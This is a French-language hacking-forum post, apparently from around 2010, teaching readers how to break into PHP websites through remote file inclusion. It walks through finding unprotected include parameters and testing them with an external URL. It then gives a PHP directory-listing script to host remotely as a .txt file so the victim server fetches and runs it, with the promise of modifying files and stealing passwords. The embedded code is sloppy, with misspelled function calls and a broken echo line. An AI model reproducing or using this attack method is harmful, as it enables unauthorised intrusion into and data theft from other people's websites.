AdMiniStraTeur CyberHeX
Localisation : ANYWARE
Messages : 28 Inscrit le: : 01/04/2010
| Sujet: Hacker un site par HTTP Dim 11 Avr - 5:58 | |
| Hacker un site par HTTP
voici un petit tutoriel qui t'apprend comment pirater des site web (php) Si tu pouvait utiliser du PHP librement sur un site,
tu pourais le hacker et en faire ce que tu veux.
Et pour certains sites, c'est impossible!
si tu vois que l'adresse d'une page d'un site est du genre http://www.Cyberforum.com/page.php?ppage=news.php par exemple (ou http://www.site.com/?url=news.php ...etc), ça signifie que la page index inclu la page news.php pour l'affichager.certain webmasters ont oublié de protegé cet include,ce qui fait que tu peux include n'importe quelle page!!!
Pour en etre sur essai ça:
http:// www.site.com/page.php?page=http://www.google.com (ne pas oublier le http://)
Si la page d'accueil de google s'affiche dans le site,c'est que tu as reussi!!!! Maitenant,tu peux modifier les fichiers, en crée, recuperer des mots de passe du site en question!
Pour afficher tous les noms de fichiers du site (tres utile pour savoir ou se trouve l'admin...etc), crée un fichier avec le code php sur ton compte: function scann($rep){$dir=opendir($rep); while($file=readdir($dir)) { if(is_dir("$rep/$file")&&$file!="."&&$file!=".") { scann("$rep/$file"); } else{ echo "$rep/$file
} } } sacnn("."); ?> Une fois ce script sur ton compte (http://www.toncompte.com/hack.txt), tu peux faire exécuter par le serveur victime comme ceci: http://www.site.com/page.php?page=http://www.toncompe.com/hack.txt Ton fichier ne doit etre en *.php, comme le disent la plupart des sites, sinon il sera executé sur ton serveur avant d'etre afficheé par le serveur victime, ce qui reviendrait à piraté ton site!!!!! Et voila!Les noms de tous les fichiers du site www.site.com son affichés sur ton écran. | |
|